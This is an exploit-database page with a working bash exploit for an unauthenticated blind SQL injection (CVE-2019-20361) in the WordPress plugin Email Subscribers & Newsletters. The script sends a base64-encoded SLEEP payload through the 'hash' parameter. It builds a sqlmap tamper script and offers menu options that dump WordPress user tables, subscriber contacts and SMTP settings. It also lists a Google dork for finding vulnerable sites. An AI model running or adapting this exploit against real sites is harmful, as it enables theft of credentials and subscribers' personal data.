WordPress Plugin Email Subscribers & Newsletters 4.2.2 hash SQL Injection (Unauthenticated)

2020.07.27
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated) # Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt # Date: 2020-07-20 # Exploit Author: KBAZ@SOGETI_ESEC # Vendor Homepage: https://www.icegram.com/email-subscribers/ # Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2 # Version: < 4.3.3 # Tested on: Email Subscribers & Newsletters 4.2.2 # CVE : CVE-2019-20361 # Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361 main () { header if [ "$#" -ne 1 ]; then echo "Usage : bash CVE-2019-20361.sh [BASE URL]" echo "Example : bash CVE-2019-20361.sh http://127.0.0.1/" exit fi url=$1 echo ' Target URL : ' "$url" echo ' Generating sqlmap tamper script in /tmp' gen_sqlmap_tamper sqlmap_cmd="sqlmap -u ${url}?es=open&hash=* --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3" echo ' SQLMap base command : ' "$sqlmap_cmd" while true do sleep 1 echo '' echo " Possible choices: " echo '' echo " 0) Exit" echo " 1) Simple vulnerability test SLEEP(5)" echo " 2) Vulnerability test with SQLMap " echo " 3) Get WP users data" echo " 4) Get subscribers information" echo " 5) Get 'Simple WP SMTP' settings" echo '' echo -n ' Choice number => ' read n case $n in 0) exit ;; 1) echo 'Testing SLEEP(5)...' { time (curl -i -s -k ${url}'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" || echo ' [-] Not vulnerable' ;; 2) $sqlmap_cmd ;; 3) $sqlmap_cmd -T wp_users,wp_usermeta --dump ;; 4) $sqlmap_cmd -T wp_ig_contacts --dump ;; 5) $sqlmap_cmd --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;; *) echo "Invalid option" ;; esac done } header () { echo '' echo ' ################################################################################################'; echo ' # ___ ___ ___ ___ ___ #'; echo ' # /\ \ /\ \ /\ \ /\ \ /\ \ ___ #'; echo ' # /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ #'; echo ' # /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ #'; echo ' # _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ #'; echo ' # /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ #'; echo ' # \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / #'; echo ' # \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ #'; echo ' # \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ #'; echo ' # \::/ / \::/ / \::/ / \:\__\ \/__/ #'; echo ' # \/__/ \/__/ \/__/ \/__/ #'; echo ' # ___ ___ ___ ___ #'; echo ' # /\ \ /\ \ /\ \ /\ \ #'; echo ' # /::\ \ /::\ \ /::\ \ /::\ \ #'; echo ' # EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ #'; echo ' # Email Subscribers & Newsletters < 4.3.1 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ #'; echo ' # Unauthenticated Blind SQL Injection /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #'; echo ' # \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ #'; echo ' # \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ #'; echo ' # \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ #'; echo ' # \:\__\ \::/ / \:\__\ \:\__\ #'; echo ' # KBAZ \/__/ \/__/ \/__/ \/__/ #'; echo ' # #'; echo ' # #'; echo ' ################################################################################################'; echo '' } raw_commands () { echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100" '","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' | base64 -w 0 { time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo '[+] Vulnerable' || echo '[-] Not vulnerable' sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3 -T wp_users,wp_usermeta --dump -T wp_ig_contacts --dump --sql-query 'select * from wp_options where option_name="swpsmtp_options"' } gen_sqlmap_tamper () { touch /tmp/__init__.py cat << _END > /tmp/tamper_CVE-2019-1356989.py #!/usr/bin/env python import base64 import urllib def tamper(payload, **kwargs): #{"message_id":"100","campaign_id":"100","contact_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"} #INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866' param = '{"contact_id":"' param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100" param += '","campaign_id":"100","message_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' #print(param%payload) return base64.encodestring( (param%payload).encode('utf-8') ).decode('utf-8').replace('\n', '') _END } main $@


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top